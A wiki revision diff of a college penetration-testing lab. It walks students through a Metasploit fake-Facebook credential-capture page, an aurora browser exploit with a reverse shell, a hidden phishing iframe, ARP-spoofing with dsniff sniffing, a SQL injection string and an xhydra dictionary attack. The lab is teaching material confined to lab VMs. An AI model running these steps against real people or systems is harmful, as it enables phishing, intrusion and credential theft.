Difference between revisions of "SEC520/labs/Lab 4"

From CDOT Wiki
Jump to: navigation, search
Line 17: Line 17:
 
<h2> <span class="mw-headline">Objectives</span></h2>
 
<h2> <span class="mw-headline">Objectives</span></h2>
 
<ol><li>Access a server by creating a webpage using the <b>&lt;iframe&gt;</b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system.
 
<ol><li>Access a server by creating a webpage using the <b>&lt;iframe&gt;</b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system.
</li><li>Understand how <b>phishing</b> can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser.
+
</li><li>Understand how <b>phishing</b> can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser.
</li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information between a connect between computers.
+
</li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information between a connect between computers.
</li><li>Access and manipulate a database server to gain access into the targeted server.
+
</li><li>Access and manipulate a database server to gain access into the targeted server.
</li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access.
+
</li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access.
 
</li></ol>
 
</li></ol>
 
<p><br>
 
<p><br>
Line 26: Line 26:
 
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2>
 
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2>
 
<ul>
 
<ul>
<li> <b>SATA Hard Disk</b> (in removable disk tray).
+
<li> <b>SATA Hard Disk</b> (in removable disk tray).
</li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations).
+
</li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations).
</li></ul>
+
</li></ul>
<p><br>
+
<p><br>
</p>
+
</p>
<h2> <span class="mw-headline">Prerequisites</span></h2>
+
<h2> <span class="mw-headline">Prerequisites</span></h2>
<ul><li> [https://wiki.cdot.senecacollege.ca/wiki/SEC520/labs/Lab_3 SEC520 Lab 3]
+
<ul><li> [https://wiki.cdot.senecacollege.ca/wiki/SEC520/labs/Lab_3 SEC520 Lab 3]
</li></ul>
+
</li></ul>
<p><br>
+
<p><br>
</p>
+
</p>
<h2> <span class="mw-headline">Online Tools and References</span></h2>
+
<h2> <span class="mw-headline">Online Tools and References</span></h2>
 
+
<ul>
+
<ul>
<li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li>
+
<li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li>
<li>[http://linuxmanpages.com/man1/nmap.1.php nmap]</li>
+
<li>[http://linuxmanpages.com/man1/nmap.1.php nmap]</li>
<li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li>
+
<li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li>
<li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li>
+
<li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li>
</ul>
+
</ul>
 
+
<p><br>
+
<p><br>
</p>
+
</p>
<h2> <span class="mw-headline">Course Notes</span></h2>
+
<h2> <span class="mw-headline">Course Notes</span></h2>
<ul>
+
<ul>
<li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li>
+
<li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li>
<li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] | [http://www.youtube.com/watch?v=Iyh_w0Ix2bc Cracking Weak Passwords] (YouTube Videos)</li>
+
<li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] | [http://www.youtube.com/watch?v=Iyh_w0Ix2bc Cracking Weak Passwords] (YouTube Videos)</li>
<li>[http://libcat.senecac.on.ca/vwebv/holdingsInfo?searchId=89542&amp;recCount=50&amp;recPointer=0&amp;bibId=315433 Penetration Tester's Open Source Toolkit (E-book)] (Chapters 4, 5, 6)</li>
+
<li>[http://libcat.senecac.on.ca/vwebv/holdingsInfo?searchId=89542&amp;recCount=50&amp;recPointer=0&amp;bibId=315433 Penetration Tester's Open Source Toolkit (E-book)] (Chapters 4, 5, 6)</li>
 
+
</ul>
+
</ul>
 
+
<p><br>
+
<p><br>
</p>
+
</p>
<h1> <span class="mw-headline">Performing Lab 4</span></h1>
+
<h1> <span class="mw-headline">Performing Lab 4</span></h1>
<br>
+
<br>
{{Admon/caution|CAUTION!|Scanning ports and exploiting servers must  
+
{{Admon/caution|CAUTION!|Scanning ports and exploiting servers must  
require the permission of Server Owner (preferably in writing). Students
+
require the permission of Server Owner (preferably in writing). Students
must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}}
+
must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}}
<br>
+
<br>
 
+
<h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2>
+
<h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2>
<br>
+
<br>
This section will demonstrate the vulnerability of a computer system  
+
This section will demonstrate the vulnerability of a computer system  
with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
+
with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
<br>
+
<br>
INSTRUCTIONS:
+
INSTRUCTIONS:
<br /><br />
+
<br /><br />
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available.
+
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available.
<br /><br />
+
<br /><br />
In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:
+
In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:
<br /><br />
+
<br /><br />
{{Admon/tip|Using The MSF Console|
+
{{Admon/tip|Using The MSF Console|
<b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armatage!<br /><br />
+
<b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armatage!<br /><br />
We will be running the <b>msfconsole</b> command to access the command shell, and setup a typical phishing attack.
+
We will be running the <b>msfconsole</b> command to access the command shell, and setup a typical phishing attack.
|}}
+
|}}
<br />
+
<br />
<ol>
+
<ol>
<li>Login as <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.<br>
+
<li>Login as <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.<br>
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
+
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
<br /></li>
+
<br /></li>
<li>In the <b>msfconsole</b>, issue the following commands:
+
<li>In the <b>msfconsole</b>, issue the following commands:
<br /></li>
+
<br /></li>
</ol>
+
</ol>
<pre>
+
<pre>
      use auxiliary/server/capture/http_basic
+
use auxiliary/server/capture/http_basic
      show options
+
show options
      set REALM Facebook Gateway
+
set REALM Facebook Gateway
      set URIPATH /
+
set URIPATH /
      run
+
run
</pre>
+
</pre>
<ol>
+
<ol>
<li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
+
<li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
</li><li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.</li>
+
</li><li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.</li>
 
</ol>
 
</ol>
 
{{Admon/important|Disable Internet Explorer Enhanced Security|
 
{{Admon/important|Disable Internet Explorer Enhanced Security|
Line 103: Line 103:
  
 
<ol>
 
<ol>
<li value="5">Switch to your vulnerable Windows server, make certain that you are logged in as <b>Administrator</b>.</li>
+
<li value="5">Switch to your vulnerable Windows server, make certain that you are logged in as <b>Administrator</b>.</li>
<li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Unclick the checkboxes for admin and all other users and then click <b>Next</b>.</li>
+
<li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Unclick the checkboxes for admin and all other users and then click <b>Next</b>.</li>
<li>Login into a regular user account and open a web-browser.</li>
+
<li>Login into a regular user account and open a web-browser.</li>
<li>Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box</li>
+
<li>Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box</li>
<li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Where you able to determine the username and password?</li>
+
<li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Where you able to determine the username and password?</li>
<li>Did you think it would be harder to exploit a machine in this way?</li>
+
<li>Did you think it would be harder to exploit a machine in this way?</li>
<li>How popular do you think this type of human-based attack is?</li>
+
<li>How popular do you think this type of human-based attack is?</li>
<li>How can you prevent this type of attack from occurring on a "hardened system"?</li>
+
<li>How can you prevent this type of attack from occurring on a "hardened system"?</li>
<li>Record your findings in your lab log-book.</li>
+
<li>Record your findings in your lab log-book.</li>
 
</ol>
 
</ol>
 
<br /><br />
 
<br /><br />
Line 118: Line 118:
 
Here is how simple (subtle) it can be:<br /><br />
 
Here is how simple (subtle) it can be:<br /><br />
 
<ol>
 
<ol>
  <li>Perform a Google search to use msfconsole to setup a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li><li>Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy such as e-mail usernames and facebook accounts.</li>
+
<li>Perform a Google search to use msfconsole to setup a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li><li>Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy such as e-mail usernames and facebook accounts.</li>
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
+
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
+
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
<pre> &lt;iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"&gt; &lt;/iframe&gt;
+
<pre> &lt;iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"&gt; &lt;/iframe&gt;
</pre></li>
+
</pre></li>
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the &lt;iframe&gt; element.</li>
+
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the &lt;iframe&gt; element.</li>
 
</ol>
 
</ol>
 
|}}
 
|}}
 
<ol>
 
<ol>
<br />
+
<br />
<li value="14">Proceed to Task #2</li>
+
<li value="14">Proceed to Task #2</li>
</ol>
+
</ol>
 
<p><b>Answer the Task #1 observations / questions in your lab log book.</b>
 
<p><b>Answer the Task #1 observations / questions in your lab log book.</b>
 
</p>
 
</p>
Line 136: Line 136:
  
 
<p><br>
 
<p><br>
This section will demonstrate an <b>IP Spoofing</b> attack (sometimes  
+
This section will demonstrate an <b>IP Spoofing</b> attack (sometimes  
referred to as <i>"arp poisoning"</i>) where the target server is "tricked"  
+
referred to as <i>"arp poisoning"</i>) where the target server is "tricked"  
into communicating with a server that assumes has the correct MAC  
+
into communicating with a server that assumes has the correct MAC  
address. The attacker can then <b>"feed packets"</b> to the destination allowing for an uninterupted session to obtain information such as usernames and passwords.
+
address. The attacker can then <b>"feed packets"</b> to the destination allowing for an uninterupted session to obtain information such as usernames and passwords.
<br><br>
+
<br><br>
INSTRUCTIONS:
+
INSTRUCTIONS:
</p><ol>
+
</p><ol>
<li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li>
+
<li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li>
<li>Note the IP Address of your Windows server.
+
<li>Note the IP Address of your Windows server.
</li><li>Make certain that your Windows machine is running an FTP  
+
</li><li>Make certain that your Windows machine is running an FTP  
server. Set up the FTP server to only allow users to access the FTP  
+
server. Set up the FTP server to only allow users to access the FTP  
server by username and password (possibly not required from default installation and startup).</li>
+
server by username and password (possibly not required from default installation and startup).</li>
<li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li>
+
<li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li>
<li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li>
+
<li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li>
<li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li>
+
<li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li>
<li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li>
+
<li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li>
<li>Switch to your Kali Linux (host) server, and open a shell terminal.</li>
+
<li>Switch to your Kali Linux (host) server, and open a shell terminal.</li>
<li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t  &nbsp;&nbsp; WINDOWS_IP_ADDR  &nbsp;&nbsp; LINUX_IP_ADDR</b><br><br> </li>
+
<li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t  &nbsp;&nbsp; WINDOWS_IP_ADDR  &nbsp;&nbsp; LINUX_IP_ADDR</b><br><br> </li>
<li>We need to continue the "man in the middle" attack by now  
+
<li>We need to continue the "man in the middle" attack by now  
performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following  
+
performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following  
Linux command: <br><br><b>sudo arpspoof -t &nbsp;&nbsp; LINUX_IP_ADDR_LINUX  &nbsp;&nbsp; WINDOWS_IP_ADDR</b><br><br></li>
+
Linux command: <br><br><b>sudo arpspoof -t &nbsp;&nbsp; LINUX_IP_ADDR_LINUX  &nbsp;&nbsp; WINDOWS_IP_ADDR</b><br><br></li>
<li>Switch to first your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li>
+
<li>Switch to first your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li>
 
</ol>
 
</ol>
  
Line 165: Line 165:
 
<br>
 
<br>
 
<ol>
 
<ol>
<li value="12">To complete the "man in the middle" attack, you are required to establish <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:<br><br><b>sudo su</b>  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # login with admin passord<br /><b> echo 1 &gt; /proc/sys/net/ipv4/ip_forward</b><br><br>(This means to set IP FORWARDING to "True" or "On")<br><br></li>
+
<li value="12">To complete the "man in the middle" attack, you are required to establish <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:<br><br><b>sudo su</b>  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # login with admin passord<br /><b> echo 1 &gt; /proc/sys/net/ipv4/ip_forward</b><br><br>(This means to set IP FORWARDING to "True" or "On")<br><br></li>
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
+
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
 
</ol>
 
</ol>
 
{{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there
 
{{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there
is an ambundence of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}
+
is an ambundence of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}
 
<br>
 
<br>
 
<ol>
 
<ol>
<li value="14">On an available shell terminal on your host (attack) server, and issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate dsniff superuser executable)</li>
+
<li value="14">On an available shell terminal on your host (attack) server, and issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate dsniff superuser executable)</li>
<li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li>
+
<li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li>
<li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li>
+
<li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li>
 
</ol>
 
</ol>
 
{{Admon/important|FTP Doesn't Work / Alternative Arp Posioning Method|
 
{{Admon/important|FTP Doesn't Work / Alternative Arp Posioning Method|
Line 186: Line 186:
  
 
<ol>
 
<ol>
<li value="17">Then switch back to your host (attack) server.</li>
+
<li value="17">Then switch back to your host (attack) server.</li>
<li>What do you notice? Is this information sufficent to logon as a Windows system user? Record your findings in your lab log-book.</li>
+
<li>What do you notice? Is this information sufficent to logon as a Windows system user? Record your findings in your lab log-book.</li>
<li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li>
+
<li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li>
<li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li>
+
<li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li>
<li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li>
+
<li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li>
<li>Record your findings/answers in your lab log-book.</li>
+
<li>Record your findings/answers in your lab log-book.</li>
<li>Proceed to Task #3</li>
+
<li>Proceed to Task #3</li>
</ol>
+
</ol>
  
 
<p><b>Answer Task #2 observations / questions in your lab log book.</b>
 
<p><b>Answer Task #2 observations / questions in your lab log book.</b>
</p><p><br>
+
</p><p><br>
 
</p>
 
</p>
  
Line 210: Line 210:
 
INSTRUCTIONS:
 
INSTRUCTIONS:
 
<ol>
 
<ol>
<li>Study the following PHP code below: </li>
+
<li>Study the following PHP code below: </li>
 
</ol>
 
</ol>
 
<pre> &lt;?php
 
<pre> &lt;?php
 
+
$user = $_POST['usr'];
+
$user = $_POST['usr'];
 
+
$user = "anything' OR x='x";
+
$user = "anything' OR x='x";
 
+
mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");
+
mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");
 
+
?&gt;
+
?&gt;
 
+
 
</pre>
 
</pre>
 
<br>
 
<br>
  
 
<ol>
 
<ol>
<li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li>
+
<li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li>
<li>View the associated <b>YouTube</b> video in the resources above, and try briefly explained why this type of attack could work. Write your explanation in your lab log-book.</li>
+
<li>View the associated <b>YouTube</b> video in the resources above, and try briefly explained why this type of attack could work. Write your explanation in your lab log-book.</li>
<li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour:</li>
+
<li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour:</li>
 
</ol>
 
</ol>
 
<pre> &lt;?php
 
<pre> &lt;?php
 
+
$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;
+
$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;
 
+
$user = "anything' OR x='x";
+
$user = "anything' OR x='x";
 
+
mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");
+
mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");
 
+
?&gt;
+
?&gt;
 
+
 
</pre>
 
</pre>
 
<ol>
 
<ol>
<li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li>
+
<li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li>
<li>Proceed to Task #4.</li>
+
<li>Proceed to Task #4.</li>
 
</ol>
 
</ol>
  
 
<p><b>Answer Task #3 observations / questions in your lab log book.</b>
 
<p><b>Answer Task #3 observations / questions in your lab log book.</b>
</p><p><br>
+
</p><p><br>
 
</p>
 
</p>
  
Line 262: Line 262:
 
INSTRUCTIONS:
 
INSTRUCTIONS:
 
<ol>
 
<ol>
<li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li>
+
<li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li>
<li>How could you obtain usernames (eg. e-mail usernames) for a targetted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.</li>
+
<li>How could you obtain usernames (eg. e-mail usernames) for a targetted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.</li>
<li>Assuming that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.<br /><br /></li>
+
<li>Assuming that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.<br /><br /></li>
</ol>
+
 
{{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}}
+
{{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}}
<br>
+
<br>
 +
<li value="4">We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.<br /><br /></li>
 +
<li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li>
  
 +
{{Admon/important|xhydra|xhydra is a graphical frontend of a program
 +
that scans open ports, and attempts to crack account passwords that are
 +
weak using a dictionary file of potential passwords. Of course, you
 +
could have performed this task manually by using <b>nmap</b> to scan open ports, and use other password cracking tools (such as <b>Cain and Able</b>), but <b>xhydra</b> performs these operations automatically.|}}
 +
<br>
  
<ol>
 
<li value="4">We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.</b><br /><br /></li>
 
<li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li>
 
</ol>
 
{{Admon/important|xhydra|xhydra is a graphical frontend of a program
 
that scans open ports, and attempts to crack account passwords that are
 
weak using a dictionary file of potential passwords. Of course, you
 
could have performed this task manually by using <b>nmap</b> to scan open ports, and use other password cracking tools (such as <b>Cain and Able</b>), but <b>xhydra</b> performs these operations automatically.|}}
 
<br>
 
  
<ol>
+
<li value="6">To launch the xhydra application as root (unless you are already in root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li>
<li value="6">To launch the xhydra application as root (unless you are already in root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li>
+
<li>In the initial application window (ie. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li>
<li>In the initial application window (ie. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li>
+
<li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li>
<li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li>
+
<li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li>
<li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li>
+
<li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li>
<li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li>
+
<li>In the <b>Username</b> section, type the username called <b>weak</b>.</li>
<li>In the <b>Username</b> section, type the username called <b>weak</b>.</li>
+
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li>
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li>
+
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
+
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
+
<li>This attack may take several minutes to complete.</li>
<li>This attack may take several minutes to complete.</li>
+
<li>Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.<br><br></li>
<li>Check the output from the Password Cracking Attempt. Did it list  
 
any usernames and passwords? If so, record the information in your lab  
 
log-book.<br><br></li>
 
</ol>
 
 
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
 
